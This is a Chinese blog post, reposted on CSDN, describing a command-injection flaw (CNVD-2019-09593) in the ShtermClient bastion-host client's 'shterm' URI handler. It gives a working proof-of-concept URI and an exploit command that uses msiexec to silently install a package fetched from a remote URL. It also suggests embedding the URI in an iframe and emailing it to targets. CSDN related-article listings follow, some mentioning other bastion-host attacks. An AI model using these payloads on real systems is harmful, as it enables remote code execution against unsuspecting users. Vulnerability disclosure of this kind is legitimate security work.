齐治堡垒机

最新推荐文章于 2024-06-03 11:56:56 发布
最新推荐文章于 2024-06-03 11:56:56 发布
阅读量8.5k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45631366/article/details/109065788
版权

一、基本信息
参考:https://www.cnvd.org.cn/flaw/show/1559039

补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。

二、漏洞挖掘过程
这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。

1、挖掘过程
首先,在安装齐治运维堡垒机客户端软件ShtermClient后,会在计算机上注册一个伪协议“shterm”。堡垒机正是通过该协议,调用本地程序打开了连接到堡垒机的通道。如下图是chrome浏览器打开链接时的提示。

我们可以在注册表中找到它,Command子项指明了如何处理shterm协议的URI。

通过对该过程的抓包分析,发现将”app”:”mstsc”改为”app”:”calc”,生成的shterm URI即可打开本地的计算器。一度认为命令只能注入app参数,后来使用Procmon.exe监控LoadShell.exe的执行,发现会在%tmp%目录下生成一些日志文件,通过分析日志文件以及多次测试,得到了最终可行的利用方案。

Client/inflate.php源代码,可见服务端仅是将提交的数据,先进行压缩,在进行base64编码后即输出。

2、漏洞验证
如果你使用了存在漏洞的shtermclient,在浏览器中打开以下链接,将会在本机打开计算器calc.exe。

shterm://eJyrVkosKFCyUkpOzElWqgUAIf8Ejw==

三、漏洞利用
1、搭建测试环境
首先在靶机上安装ShtermClient-2.1.1。

然后,在kali上搭建PHP环境,以便生成shterm URI,见下图。

在靶机的浏览器中打开链接,即可弹出计算器。

2、Exploit
如下图,提交该POST请求,生成的shterm URI将会执行命令:

msiexec.exe /q /n /i https://github.com/Yasushi/putty/archive/master.msi

然后,把shterm URI放入iframe中,将该html页面的地址通过邮件或者你能想到的其他途径发给目标用户,即可达到不可告人的目的。

demo

demo

齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)


Hacked by StudyCat

转载请注明出处。

转载于:https://www.cnblogs.com/StudyCat/p/11201725.html

pow(^_^,N)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
齐治堡垒机学习资料.zip
05-29
里面是齐治科技的堡垒机的学习资料(课件PPT),有需要学习这方面内容的可以下载,方便自己的了解这个行业的情况。
oracle 审计日志_齐治堡垒机:让数据库运维审计无死角
weixin_39543655的博客
11-22 445
当系统出现威胁事件,或因为某个可疑行为而亮起红灯,安全人员总是要面临如下问题:是谁动了我的数据,这个人做了什么? 操作行为是何时发生的?又是在哪些资产上进行的? 访问或者更改行为是否得到了批准?他是如何获取权限的?针对以上问题,仅仅记录完整的系统日志远远不够,而使用数据库自身的审计功能会影响数据库性能,专业的数据库审计产品又缺乏运维人员的审计维度,于是数据库运维审计成为用户最佳选择。本文主要基于M...
新手如何通过挖漏洞赚钱,看这篇就够了!!!
最新发布
jennycisp的博客
06-03 854
在这段时间里,我参与了多个实际项目的规划和实施,成功防范了各种网络攻击和漏洞利用,提高了互联网安全防护水平。接下来我将完整的讲述漏洞挖掘过程中所有的细节,干货满满,内容有点长,记得点赞收藏!漏洞挖掘****的流程一般可以概括为以下几个步骤:漏洞去哪挖?SRC即各个公司,厂商创建的漏洞安全响应中心。每家SRC都有着自己的漏洞收取范围以及漏洞收取标准。我这里给大家搜集整理了互联网公司常见的SRC平台。 挖漏洞前期的准备工作 一些在线的搜索引擎网站: (一)资产测绘引擎fofa资产测绘引擎:https://fof
齐治 堡垒机 mysql_齐治堡垒机:让数据库运维审计无死角
weixin_35726374的博客
01-28 740
当系统出现威胁事件,或因为某个可疑行为而亮起红灯,安全人员总是要面临如下问题:是谁动了我的数据,这个人做了什么?操作行为是何时发生的?又是在哪些资产上进行的?访问或者更改行为是否得到了批准?他是如何获取权限的?针对以上问题,仅仅记录完整的系统日志远远不够,而使用数据库自身的审计功能会影响数据库性能,专业的数据库审计产品又缺乏运维人员的审计维度,于是数据库运维审计成为用户最佳选择。本文主要基于MS ...
齐治堡垒机,功能诠释表!
qq_43259369的博客
07-28 2292
堡垒机现如今走进很多企业或者是政府单位,在如今这个互联网的社会,也愈发让很多企业更加的重视安全,很多安全产品被广泛应用于企业。 一,保障了操作记录可查性,减小了出事故之后排查的力度,增加了工作效率。 二,可以系统的控制账号,控制权限,保证了层级分明。 三,可以支持多种应用的发布,包括数据库,谷歌和火狐浏览器和ie浏览器,还可以支持防火墙,Tomcat等 ...
windows机器密码错误---齐治堡垒机
luo_test的博客
08-11 1385
系统:windows server 2012 现象:新建的系统user权限账号陆续出现无法登录,提示密码错误 故障原因:通过管理员账号进入系统,重新设置密码,再重新改密后正常,根据账号新建的时间,确定是因为新建账号未勾选密码不过期,导致密码到期无法登录。 总结:新建账号时选择密码不过去,将密码策略设置未不过期。 ...
齐治堡垒机私钥登录及后渗透
网络安全。
01-23 766
(目前在 php 版本齐治成功,其他版本未测试)1、老、新版本私钥。2、直接指定私钥登录,可以使用 xshell、命令行(ssh 端口可能是 22 或者 8022)命令行命令:ssh root@1.1.1.1 -i rsa -p 22我这里直接使用 xshell 登录了。登录成功。
齐治堡垒机配置网络.pdf
09-26
齐治堡垒机配置网络 本文档主要介绍齐治堡垒机配置网络的相关知识点,涵盖了网络规划、网口绑定、IP地址配置、网关配置、DNS配置、路由配置、心跳网口地址配置、主机名域名配置等方面的内容。 一、网络规划 在...
qizhi_ssh:绕过齐治堡垒机1000台机器限制
05-11
公司里一开始引进了齐治堡垒机, 但是原生的系统有几个问题 a) 界面难看死了 b) 没办法关联项目 c) 最重要的是它只支持1000台记录的录入, 多了就无法通过堡垒机登录审计了 d) 录入机器贼麻烦 于是我就有了一个想法 ...
ShtermClient-2.3.5齐治堡垒 亲测可用
02-20
【ShtermClient-2.3.5 齐治堡垒 亲测可用】是一款针对企业级安全管理的远程控制软件,特别适用于需要高效、安全访问远程服务器的企业或个人。这款软件集成了强大的终端模拟功能,提供了对不同操作系统,如Linux、...
堡垒机应用发布手册.pdf
08-05
堡垒机应用发布手册.pdf
堡垒机控件
12-01
堡垒机控件 ShtermClient-2.2.6.exe
堡垒机客户端
07-09
堡垒机客户端网络资源权限控制用,欢迎下载。
堡垒机的安装包
09-07
http://www.cnblogs.com/kevingrace/p/5570279.html 安装的教程在这里
RIS使用手册
07-04
关于医院放射科的一套RIS系统的设计文档
堡垒机的安装及使用
2301_79194110的博客
08-09 512
堡垒机相关知识介绍
mysql堡垒机漏洞_绿盟UTS绕过登录/齐治堡垒机 rce
weixin_39865440的博客
02-02 1100
1.绿盟UTS绕过登录随便输密码->修改返回包为True->放行->等待第二次拦截包->内含管理员MD5->替换MD5登录直接请求接口:/webapi/v1/system/accountmanage/account2.齐治堡垒机 rce利用条件:无需登录:第一http://10.20.10.11/listener/cluster_manage.php 返回“OK”。第...
跳板机和堡垒机
weixin_50726938的博客
12-26 1747
以某运维安全审计产品为例,其产品更侧重于运维安全管理,它集单点登录、账号管理、身份认证、资源授权、访问控制和操作审计为一体的新一代运维安全审计产品,它能够对操作系统、网络设备、安全设备、数据库等操作过程进行有效的运维操作审计,使运维审计由事件审计提升为操作内容审计,通过系统平台的事前预防、事中控制和事后溯源来全面解决企业的运维安全问题,进而提高企业的IT运维管理水平。系统提供基于用户、运维协议、目标主机、运维时间段(年、月、日、周、时间)等组合的授权功能,实现细粒度授权功能,满足用户实际授权的需求。
浏览器上登录堡垒机_市面上两款主流堡垒机的功能对比
weixin_39796140的博客
12-08 689
堡垒机的部署在信息安全建设过程中是必不可少的一个设备。堡垒机又叫“跳板机”,专业的也会叫做“运维操作审计系统”。它可以避免系统管理员直接接触服务器的密码,便于人员的管理和权限的分配。堡垒机会记录管理员的所有操作,避免出现问题,部门之间的相互扯皮,也可设定一些禁止使用的命令和参数,避免出现类似微盟的问题。一、系统操作员接入方式齐治堡垒机:管理员先行为各个操作员建立账户,指定密码。碉堡堡垒机:管理员...
齐治堡垒机配置密钥登录
06-09
配置齐治堡垒机使用密钥登录的步骤如下: 1. 生成密钥对:使用ssh-keygen命令生成密钥对,包括公钥和私钥。 2. 将公钥复制到齐治堡垒机:将生成的公钥复制到齐治堡垒机的authorized_keys文件中。可以使用ssh-copy-id命令将公钥复制到齐治堡垒机上。 3. 配置ssh客户端:在本地机器上的ssh客户端配置文件中,添加IdentityFile选项,将私钥文件的路径指定为该选项的值。 4. 登录齐治堡垒机:使用ssh命令以密钥身份验证登录齐治堡垒机。例如:ssh username@bastion-host -i /path/to/privatekey。 通过以上步骤,就可以实现使用密钥登录齐治堡垒机了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值